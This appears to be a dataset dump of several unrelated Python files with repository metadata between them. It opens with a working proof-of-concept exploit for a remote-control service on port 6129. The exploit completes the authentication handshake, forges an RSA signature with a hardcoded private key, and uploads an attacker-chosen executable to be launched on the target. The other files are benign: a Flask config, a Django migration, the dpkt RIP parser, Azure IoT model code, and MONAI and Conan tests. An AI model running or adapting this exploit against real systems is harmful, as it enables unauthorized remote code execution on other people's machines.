def dump(title, data):
print '--- [ %s ] --- ' % (title)
print hexdump(data)
def recvall(sock, n):
data = ''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def xrecv(sock):
data = ''
# Read 0xc-byte header
data = recvall(sock, 0xc)
# Parse header
(type, unk, size) = unpack('<III', data)
# Get data if any
if size:
data += recvall(sock, size)
return data
def aes_cbc_encrypt(data,key,iv):
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.encrypt(data)
def aes_cbc_decrypt(data,key,iv):
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.decrypt(data)
def int2bin(i):
hs = format(i, 'x')
if (len(hs) % 2):
hs = '0' + hs
return binascii.unhexlify(hs)
#
# MAIN
#
desc = 'This PoC attempts to upload and run a malicious dwDrvInst.exe.'
arg_parser = argparse.ArgumentParser(desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-e', required=True, help='exe to send as dwDrvInst.exe (Required)')
arg_parser.add_argument('-p', type=int, default=6129, help='DWRCS.exe port, default: 6129')
args = arg_parser.parse_args()
host = args.t
port = args.p
exe = args.e
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host, port))
# Read MSG_TYPE_VERSION
res = s.recv(0x28)
(type,) = unpack_from('<I', res)
if type != 0x00001130:
print 'Received message not MSG_TYPE_VERSION'
s.clos()
sys.exit(1)
# Send MSG_TYPE_VERSION, requesting smart card auth
req = pack('<I4sddIIII', 0x1130,'\x00',12.0,0.0,4,0,0,3)
s.sendall(req)
# Read MSG_CLIENT_INFORMATION_V7
res = recvall(s,0x3af8)
(type,) = unpack_from('<I', res)
if type != 0x00011171:
print 'Received message not MSG_CLIENT_INFORMATION_V7'
s.close()
sys.exit(1)
#dump('server MSG_CLIENT_INFORMATION_V7', res)
# Pick out the datetime string
datetime = ''
i = 8
b = res[i]
while(b != '\x00'):
datetime += b
i = i + 2
b = res[i]
salt ='\x54\x40\xf4\x91\xa6\x06\x25\xbc'
prf = lambda p,s: HMAC.new(p,s,SHA512).digest()
key = KDF.PBKDF2(datetime, salt, 16, 1000, prf)
dump('Derived key from passwd ' + datetime, key)
#
# Send MSG_CLIENT_INFORMATION_V7
#
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Read MSG_TYPE_RSA_CRYPTO_C_INIT
res = recvall(s,0x1220)
(type,enc_len,) = unpack_from('<II', res)
if type != 0x000105b8:
print 'Received message not MSG_TYPE_RSA_CRYPTO_C_INIT'
s.close()
sys.exit(1)
#dump('server MSG_TYPE_RSA_CRYPTO_C_INIT', res)
# Encrypted params at offset 0x100c
crypt = res[0x100c:0x100c+enc_len]
iv ='\x54\x40\xF4\x91\xA6\x06\x25\xBC\x8E\x84\x56\xD6\xCB\xB7\x40\x59'
params = aes_cbc_decrypt(crypt,key,iv)
dump('Encrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', crypt)
dump('Decrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', params)
# Send MSG_TYPE_RSA_CRYPTO_C_INIT
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Read MSG_000105b9 (1)
res = recvall(s,0x2c2c)
(type,) = unpack_from('<I', res)
if type != 0x000105b9:
print 'Received message not MSG_000105b9'
s.close()
sys.exit(1)
#dump('server MSG_000105b9 (1)', res)
# Get server DH public key
(pubkey_len,) = unpack_from('<I', res, 0x140c)
srv_pubkey = res[0x100c:0x100c+pubkey_len]
dump('server DH public key', srv_pubkey)
srv_pubkey = int(binascii.hexlify(srv_pubkey), base=16)
dh_prime = 0xF51FFB3C6291865ECDA49C30712DB07B
dh_gen = 3
clt_privkey = int(binascii.hexlify(os.urandom(16)), base=16)
clt_pubkey = int2bin(pow(dh_gen, clt_privkey, dh_prime))
dump('client DH public key', clt_pubkey)
shared_secret = int2bin(pow(srv_pubkey, clt_privkey, dh_prime))
dump('DH shared secret', shared_secret)
# Compute the sum of the bytes in the shared secret
clt_sum = 0
for b in shared_secret: clt_sum = clt_sum + ord(b)
buf = list(res);
# Send MSG_000105b9 (1)
# Fill in client DH public key and length
buf[0x1418:0x1418+len(clt_pubkey)] = clt_pubkey
buf[0x1818:0x1818 + 4] = pack('<I',len(clt_pubkey))
req = ''.join(buf)
#dump('client MSG_000105b9 (1)', req)
s.sendall(req)
#
# Server send back the length and addsum of the shared secret
#
res = recvall(s,0x2c2c)
(type,) = unpack_from('<I', res)
if type != 0x000105b9:
print 'Received message not MSG_000105b9'
s.close()
sys.exit(1)
#dump('server MSG_000105b9 (2)', res)
(srv_sum,) = unpack_from('<I', res, 0x1820)
# Byte sum of the shared secret should match on the client and server
print 'client-computed sum of the DH shared secret: 0x%x' % (clt_sum)
print 'server-computed sum of the DH shared secret: 0x%x' % (srv_sum)
#
# 1024-byte RSA key
#
rsa_key = "\x30\x82\x02\x5D\x02\x01\x00\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7"
rsa_key += "\x0B\xCA\xF7\x50\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99"
rsa_key += "\x78\x05\x92\x94\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7"
rsa_key += "\x9A\x79\x4D\x69\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA"
rsa_key += "\x86\x6C\x23\xAE\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78"
rsa_key += "\x6B\x77\xD0\xBB\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC"
rsa_key += "\x9A\x86\xA2\x4F\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33"
rsa_key += "\x67\x97\x7C\x0D\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61"
rsa_key += "\xCA\xB8\x9E\x14\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
rsa_key += "\x02\x81\x81\x00\xA1\x60\xCF\x22\xD7\x33\x3B\x18\x00\x85\xB7\xC3"
rsa_key += "\x3C\x4C\x3F\x22\x79\x3D\xB4\xED\x70\x3D\xF0\x08\x9E\x3D\x5A\x56"
rsa_key += "\x5E\x1C\x60\xFC\xAB\xD5\x64\x9D\xDE\x5C\xE1\x41\x3F\xED\x9F\x60"
rsa_key += "\x7B\x9C\x36\xE4\xBC\x78\xEC\x16\xFF\x0B\x42\x51\x67\x8C\x23\x64"
rsa_key += "\xAC\xBF\xF8\xCB\xED\xE8\x46\x66\x40\x8F\x70\x46\x10\x9C\x63\x07"
rsa_key += "\x74\x33\x64\x26\x25\xA6\x34\x43\x8F\x95\xA9\x70\xD1\x40\x69\x0B"
rsa_key += "\xF8\xC8\x62\x5F\x8D\xE8\x8F\xC4\x46\xBF\x09\xAB\x83\x68\xFE\x5F"
rsa_key += "\x2D\x2D\x3B\xD9\xF5\xD5\x32\x34\xBC\x37\x17\xCB\x13\x50\x96\x6E"
rsa_key += "\x26\x82\xC2\x39\x02\x41\x00\xD9\x5D\x24\x6C\x3B\xA7\x85\x7F\xD9"
rsa_key += "\x6A\x7E\xDC\x4E\xDC\x67\x10\x1D\x6E\xAC\x19\xA9\xA3\xF7\xC0\x27"
rsa_key += "\x0A\xC3\x03\x94\xB5\x16\x54\xFC\x27\x3B\x41\xBC\x52\x80\x6B\x14"
rsa_key += "\x01\x1D\xAC\x9F\xC0\x04\xB9\x26\x01\x96\x68\xD8\xB9\x9A\xAD\xD8"
rsa_key += "\xA1\x96\x84\x93\xA2\xD8\xAF\x02\x41\x00\xCC\x65\x9E\xA8\x08\x7B"
rsa_key += "\xD7\x3D\x61\xD2\xB3\xCF\xC6\x4F\x0C\x65\x25\x1E\x68\xC6\xAC\x04"
rsa_key += "\xD0\xC4\x3A\xA7\x9E\xEB\xDE\xD9\x20\x9A\xCE\x92\x77\xB7\x84\xC0"
rsa_key += "\x1B\x42\xB4\xCA\xBE\xFC\x20\x88\x68\x2D\x0F\xC4\x6D\x44\x28\xA0"
rsa_key += "\x40\x0F\x88\x25\x08\x12\x51\x86\x42\x55\x02\x41\x00\xA4\x52\x0D"
rsa_key += "\x9E\xE4\xDA\x17\xCA\x37\x0A\x93\x2C\xE9\x51\x25\x78\xC1\x47\x51"
rsa_key += "\x43\x75\x43\x47\xA0\x33\xE3\xA6\xD9\xA6\x29\xDF\xE0\x0F\x5F\x79"
rsa_key += "\x24\x90\xC1\xAD\xE3\x45\x14\x32\xE2\xB5\x41\xEC\x50\x2B\xB3\x37"
rsa_key += "\x89\xBB\x8D\x54\xA9\xE8\x03\x00\x4E\xE9\x6D\x4A\x71\x02\x40\x4E"
rsa_key += "\x23\x73\x19\xCD\xD4\x7A\x1E\x6F\x2D\x3B\xAC\x6C\xA5\x7F\x99\x93"
rsa_key += "\x2D\x22\xE5\x00\x91\xFE\xB5\x65\xAE\xFA\xE4\x35\x17\x50\x8D\x9D"
rsa_key += "\xF7\x04\x69\x56\x08\x92\xE3\x57\x76\x42\xB8\xE4\x3F\x01\x84\x68"
rsa_key += "\x88\xB1\x34\xE3\x4B\x0F\xF2\x60\x1B\xB8\x10\x38\xB6\x58\xD9\x02"
rsa_key += "\x40\x65\xB1\xDE\x13\xAB\xAA\x01\x0D\x54\x53\x86\x85\x08\x5B\xC8"
rsa_key += "\xC0\x06\x7B\xBA\x51\xC6\x80\x0E\xA4\xD2\xF5\x63\x5B\x3C\x3F\xD1"
rsa_key += "\x30\x66\xA4\x2B\x60\x87\x9D\x04\x5F\x16\xEC\x51\x02\x9F\x53\xAA"
rsa_key += "\x22\xDF\xB4\x92\x01\x0E\x9B\xA6\x6C\x5E\x9D\x2F\xD8\x6B\x60\xD7"
rsa_key += "\x47"
#
# Public part of the RSA key
#
rsa_pubkey = "\x30\x81\x89\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7\x0B\xCA\xF7\x50"
rsa_pubkey += "\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99\x78\x05\x92\x94"
rsa_pubkey += "\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7\x9A\x79\x4D\x69"
rsa_pubkey += "\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA\x86\x6C\x23\xAE"
rsa_pubkey += "\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78\x6B\x77\xD0\xBB"
rsa_pubkey += "\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC\x9A\x86\xA2\x4F"
rsa_pubkey += "\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33\x67\x97\x7C\x0D"
rsa_pubkey += "\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61\xCA\xB8\x9E\x14"
rsa_pubkey += "\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
rsa_privkey = RSA.importKey(rsa_key)
hash = SHA512.new(shared_secret)
signer = PKCS1_v1_5.new(rsa_privkey)
rsa_sig = signer.sign(hash)
dump('RSA signature of the DH shared secret', rsa_sig)
buf = list(res)
# Fill in the length and sum of the client-computed DH shared secret
buf[0x1410: 0x1410 + 4] = pack('<I',len(shared_secret))
buf[0x1414: 0x1414 + 4] = pack('<I',clt_sum)
# Fill in the RSA signature of the DH shared secret
buf[0x1824: 0x1824 + len(rsa_sig)] = rsa_sig
buf[0x2024: 0x2024 + 4] = pack('<I', len(rsa_sig))
# Fill in the RSA public key
buf[0x2028: 0x2028 + len(rsa_pubkey)] = rsa_pubkey
buf[0x2828: 0x2828 + 4] = pack('<I', len(rsa_pubkey))
req = ''.join(buf)
#dump('client MSG_000105b9 (2)', req)
s.sendall(req)
# Server should send MSG_REGISTRATION_INFORMATION
res = recvall(s,0xc50)
(type,) = unpack_from('<I', res)
if type != 0x0000b004:
print 'Received message not MSG_REGISTRATION_INFORMATION'
s.close()
sys.exit(1)
#dump('server MSG_REGISTRATION_INFORMATION', res)
# Send our MSG_REGISTRATION_INFORMATION
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Server should send MSG_SOCKET_ADD
res = recvall(s,0x224)
(type,) = unpack_from('<I', res)
if type != 0x00010626:
print 'Received message not MSG_SOCKET_ADD'
s.close()
sys.exit(1)
#dump('server MSG_SOCKET_ADD', res)
# Server should MSG_D6E2
res = recvall(s,0x1438)
(type,) = unpack_from('<I', res)
if type != 0x0000D6E2:
print 'Received message not MSG_10626'
s.close()
sys.exit(1)
#dump('server MSG_D6E2', res)
# Send our MSG_D6E2
req = res
s.sendall(req)
# Server should send a MSG_SMARTCARD_COMMAND with no data part
res = xrecv(s)
(type,) = unpack_from('<I', res)
if type != 0x0000D6F6:
print 'Received message not MSG_SMARTCARD_COMMAND'
s.close()
sys.exit(1)
#dump('server MSG_SMARTCARD_COMMAND', res)
# Server should send another MSG_SMARTCARD_COMMAND with no data part
res = xrecv(s)
(type,) = unpack_from('<I', res)
if type != 0x0000D6F6:
print 'Received message not MSG_SMARTCARD_COMMAND'
s.close()
sys.exit(1)
#dump('server MSG_SMARTCARD_COMMAND', res)
# Send our dwDrvInst.exe with a MSG_SMARTCARD_COMMAND
print 'Sending malicious dwDrvInst.exe ...'
with open(exe,'rb') as f: data = f.read()
req = pack('<III', 0xD6F6,2, len(data))
req += data;
s.sendall(req)
print 'Please check if dwDrvInst.exe is launched on %s.\n' % (host)
# Any response?
print 'Checking any response from the server...'
res = s.recv(0x4000)
dump('Response after sending malicious dwDrvInst.exe', res)
| 32.351648 | 92 | 0.701681 |
5c92783e89b405a5833edfdba92d81a88bb57113 | 546 | py | Python | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | # global config
class Config:
SECRET_KEY = 'mysecretkey' # this is for CSRF
# dev env config
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'mysql://root:@localhost/flask_tasks'
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = 'smtp.googlemail.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = '[email_account]@gmail.com' #assign permissions
MAIL_PASSWORD = 'XXXXXXXXX' # or env variable
config = {
'development': DevelopmentConfig,
'default': DevelopmentConfig
}
| 27.3 | 67 | 0.71978 |
3963fe07ba384b0e929e643640b9e8bb1848c7df | 78 | py | Python | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | 1 | 2020-08-08T05:06:25.000Z | 2020-08-08T05:06:25.000Z | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | null | null | null | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | 1 | 2020-08-08T08:20:38.000Z | 2020-08-08T08:20:38.000Z | import torch
print (torch.cuda.is_available())
x = torch.rand(5, 3)
print(x) | 13 | 33 | 0.705128 |
6e04dc4fe7132fc97add149f5c947853f3363ddc | 2,098 | py | Python | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 4 | 2020-04-25T01:44:17.000Z | 2022-01-23T15:03:42.000Z | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 6 | 2021-03-30T14:33:01.000Z | 2021-09-22T19:49:36.000Z | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 1 | 2020-03-23T12:34:47.000Z | 2020-03-23T12:34:47.000Z | # Generated by Django 3.0.2 on 2020-01-29 19:40
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user', '0002_auto_20200127_1704'),
]
operations = [
migrations.CreateModel(
name='BotUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.CharField(max_length=250)),
('name', models.CharField(max_length=250, null=True)),
('email', models.CharField(max_length=250, null=True)),
('roles', models.CharField(max_length=250, null=True)),
('channel_id', models.CharField(max_length=250, null=True)),
('created_date', models.DateTimeField(default=datetime.datetime(2020, 1, 29, 19, 40, 19, 143129))),
('manager', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.BotUser')),
],
),
migrations.CreateModel(
name='InsatnceAccess',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='Instance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='insatnceaccess',
name='instance_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.Instance'),
),
migrations.AddField(
model_name='insatnceaccess',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.BotUser'),
),
]
| 38.145455 | 115 | 0.580076 |
83f29f62e27fa10253511af38a1ebf18e8bacb7a | 1,963 | py | Python | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | # $Id: rip.py 23 2006-11-08 15:45:33Z dugsong $
# -*- coding: utf-8 -*-
"""Routing Information Protocol."""
import dpkt
# RIP v2 - RFC 2453
# http://tools.ietf.org/html/rfc2453
REQUEST = 1
RESPONSE = 2
class RIP(dpkt.Packet):
__hdr__ = (
('cmd', 'B', REQUEST),
('v', 'B', 2),
('rsvd', 'H', 0)
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
l = []
self.auth = None
while self.data:
rte = RTE(self.data[:20])
if rte.family == 0xFFFF:
self.auth = Auth(self.data[:20])
else:
l.append(rte)
self.data = self.data[20:]
self.data = self.rtes = l
def __len__(self):
len = self.__hdr_len__
if self.auth:
len += len(self.auth)
len += sum(map(len, self.rtes))
return len
def __str__(self):
auth = ''
if self.auth:
auth = str(self.auth)
return self.pack_hdr() + auth + ''.join(map(str, self.rtes))
class RTE(dpkt.Packet):
__hdr__ = (
('family', 'H', 2),
('route_tag', 'H', 0),
('addr', 'I', 0),
('subnet', 'I', 0),
('next_hop', 'I', 0),
('metric', 'I', 1)
)
class Auth(dpkt.Packet):
__hdr__ = (
('rsvd', 'H', 0xFFFF),
('type', 'H', 2),
('auth', '16s', 0)
)
__s = '\x02\x02\x00\x00\x00\x02\x00\x00\x01\x02\x03\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\xc0\xa8\x01\x08\xff\xff\xff\xfc\x00\x00\x00\x00\x00\x00\x00\x01'
def test_rtp_pack():
r = RIP(__s)
assert (__s == str(r))
def test_rtp_unpack():
r = RIP(__s)
assert (r.auth is None)
assert (len(r.rtes) == 2)
rte = r.rtes[1]
assert (rte.family == 2)
assert (rte.route_tag == 0)
assert (rte.metric == 1)
if __name__ == '__main__':
test_rtp_pack()
test_rtp_unpack()
print 'Tests Successful...' | 22.05618 | 184 | 0.507387 |
440da8c529cc6ca50808106bbae128c51dd699fb | 1,365 | py | Python | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 366 | 2016-12-02T20:38:05.000Z | 2022-03-29T10:08:14.000Z | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 640 | 2016-12-16T21:59:48.000Z | 2022-03-30T20:17:52.000Z | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 371 | 2016-11-16T16:06:04.000Z | 2022-03-31T10:10:57.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RegistryStatistics(Model):
"""RegistryStatistics.
:param total_device_count: The total number of devices registered for the
IoT Hub.
:type total_device_count: long
:param enabled_device_count: The number of currently enabled devices.
:type enabled_device_count: long
:param disabled_device_count: The number of currently disabled devices.
:type disabled_device_count: long
"""
_attribute_map = {
"total_device_count": {"key": "totalDeviceCount", "type": "long"},
"enabled_device_count": {"key": "enabledDeviceCount", "type": "long"},
"disabled_device_count": {"key": "disabledDeviceCount", "type": "long"},
}
def __init__(self, **kwargs):
super(RegistryStatistics, self).__init__(**kwargs)
self.total_device_count = kwargs.get("total_device_count", None)
self.enabled_device_count = kwargs.get("enabled_device_count", None)
self.disabled_device_count = kwargs.get("disabled_device_count", None)
| 40.147059 | 80 | 0.632967 |
75f6a38d3c07c3bc1d8ac2a08e89de2316eb496b | 2,220 | py | Python | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from parameterized import parameterized
from monai.transforms import AsDiscrete
from tests.utils import TEST_NDARRAYS, assert_allclose
TEST_CASES = []
for p in TEST_NDARRAYS:
TEST_CASES.append(
[
{"argmax": True, "to_onehot": False, "num_classes": None, "threshold_values": False, "logit_thresh": 0.5},
p([[[0.0, 1.0]], [[2.0, 3.0]]]),
p([[[1.0, 1.0]]]),
(1, 1, 2),
]
)
TEST_CASES.append(
[
{"argmax": True, "to_onehot": True, "num_classes": 2, "threshold_values": False, "logit_thresh": 0.5},
p([[[0.0, 1.0]], [[2.0, 3.0]]]),
p([[[0.0, 0.0]], [[1.0, 1.0]]]),
(2, 1, 2),
]
)
TEST_CASES.append(
[
{"argmax": False, "to_onehot": False, "num_classes": None, "threshold_values": True, "logit_thresh": 0.6},
p([[[0.0, 1.0], [2.0, 3.0]]]),
p([[[0.0, 1.0], [1.0, 1.0]]]),
(1, 2, 2),
]
)
TEST_CASES.append([{"argmax": False, "to_onehot": True, "num_classes": 3}, p(1), p([0.0, 1.0, 0.0]), (3,)])
TEST_CASES.append(
[{"rounding": "torchrounding"}, p([[[0.123, 1.345], [2.567, 3.789]]]), p([[[0.0, 1.0], [3.0, 4.0]]]), (1, 2, 2)]
)
class TestAsDiscrete(unittest.TestCase):
@parameterized.expand(TEST_CASES)
def test_value_shape(self, input_param, img, out, expected_shape):
result = AsDiscrete(**input_param)(img)
assert_allclose(result, out, rtol=1e-3)
self.assertTupleEqual(result.shape, expected_shape)
if __name__ == "__main__":
unittest.main()
| 34.153846 | 120 | 0.593243 |
32a86f5761ccff29b88325b331bccc7231cb531e | 14,047 | py | Python | conans/test/unittests/model/ref_test.py | Wonders11/conan | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | [
"MIT"
] | 1 | 2019-11-04T17:23:09.000Z | 2019-11-04T17:23:09.000Z | conans/test/unittests/model/ref_test.py | Wonders11/conan | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | [
"MIT"
] | 1 | 2020-11-05T16:16:49.000Z | 2020-11-05T16:16:49.000Z | conans/test/unittests/model/ref_test.py | Mattlk13/conan | 005fc53485557b0a570bb71670f2ca9c66082165 | [
"MIT"
] | null | null | null | import unittest
import six
from conans.errors import ConanException
from conans.model.ref import ConanFileReference, ConanName, InvalidNameException, PackageReference, \
check_valid_ref, get_reference_fields
class RefTest(unittest.TestCase):
def test_basic(self):
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
self.assertEqual(ref.name, "opencv")
self.assertEqual(ref.version, "2.4.10")
self.assertEqual(ref.user, "lasote")
self.assertEqual(ref.channel, "testing")
self.assertEqual(ref.revision, None)
self.assertEqual(str(ref), "opencv/2.4.10@lasote/testing")
ref = ConanFileReference.loads("opencv_lite/2.4.10@phil_lewis/testing")
self.assertEqual(ref.name, "opencv_lite")
self.assertEqual(ref.version, "2.4.10")
self.assertEqual(ref.user, "phil_lewis")
self.assertEqual(ref.channel, "testing")
self.assertEqual(ref.revision, None)
self.assertEqual(str(ref), "opencv_lite/2.4.10@phil_lewis/testing")
ref = ConanFileReference.loads("opencv/2.4.10@3rd-party/testing")
self.assertEqual(ref.name, "opencv")
self.assertEqual(ref.version, "2.4.10")
self.assertEqual(ref.user, "3rd-party")
self.assertEqual(ref.channel, "testing")
self.assertEqual(ref.revision, None)
self.assertEqual(str(ref), "opencv/2.4.10@3rd-party/testing")
ref = ConanFileReference.loads("opencv/2.4.10@3rd-party/testing#rev1")
self.assertEqual(ref.revision, "rev1")
def test_errors(self):
self.assertRaises(ConanException, ConanFileReference.loads, "")
self.assertIsNone(ConanFileReference.loads("opencv/2.4.10@", validate=False).channel)
self.assertIsNone(ConanFileReference.loads("opencv/2.4.10@", validate=False).user)
self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10@lasote")
self.assertRaises(ConanException, ConanFileReference.loads, "opencv??/2.4.10@laso/testing")
self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10 @ laso/testing")
self.assertRaises(ConanException, ConanFileReference.loads, "o/2.4.10@laso/testing")
self.assertRaises(ConanException, ConanFileReference.loads, ".opencv/2.4.10@lasote/testing")
self.assertRaises(ConanException, ConanFileReference.loads, "o/2.4.10 @ lasote/testing")
self.assertRaises(ConanException, ConanFileReference.loads, "lib/1.0@user&surname/channel")
self.assertRaises(ConanException, ConanFileReference.loads,
"opencv%s/2.4.10@laso/testing" % "A" * 40)
self.assertRaises(ConanException, ConanFileReference.loads,
"opencv/2.4.10%s@laso/testing" % "A" * 40)
self.assertRaises(ConanException, ConanFileReference.loads,
"opencv/2.4.10@laso%s/testing" % "A" * 40)
self.assertRaises(ConanException, ConanFileReference.loads,
"opencv/2.4.10@laso/testing%s" % "A" * 40)
self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso/testing")
self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso/test#1")
self.assertRaises(ConanException, ConanFileReference.loads, "opencv@2.4.10/laso/test")
self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso@test")
def test_revisions(self):
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
self.assertEqual(ref.channel, "testing")
self.assertEqual(ref.revision, "23")
ref = ConanFileReference.loads("opencv/2.4.10#23")
self.assertIsNone(ref.channel)
self.assertIsNone(ref.user)
self.assertEqual(ref.name, "opencv")
self.assertEqual(ref.version, "2.4.10")
self.assertEqual(ref.revision, "23")
ref = ConanFileReference("opencv", "2.3", "lasote", "testing", "34")
self.assertEqual(ref.revision, "34")
pref = PackageReference.loads("opencv/2.4.10@lasote/testing#23:123123123#989")
self.assertEqual(pref.revision, "989")
self.assertEqual(pref.ref.revision, "23")
pref = PackageReference(ref, "123123123#989")
self.assertEqual(pref.ref.revision, "34")
def test_equal(self):
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#232")
self.assertFalse(ref == ref2)
self.assertTrue(ref != ref2)
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#232")
self.assertFalse(ref == ref2)
self.assertTrue(ref != ref2)
self.assertTrue(ref2 != ref)
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
self.assertTrue(ref == ref2)
self.assertFalse(ref != ref2)
ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
self.assertTrue(ref == ref2)
self.assertFalse(ref != ref2)
class ConanNameTestCase(unittest.TestCase):
def _check_invalid_format(self, value, *args):
with six.assertRaisesRegex(self, InvalidNameException, "Valid names"):
ConanName.validate_name(value, *args)
def _check_invalid_version(self, name, version):
with six.assertRaisesRegex(self, InvalidNameException, "invalid version number"):
ConanName.validate_version(version, name)
def _check_invalid_type(self, value):
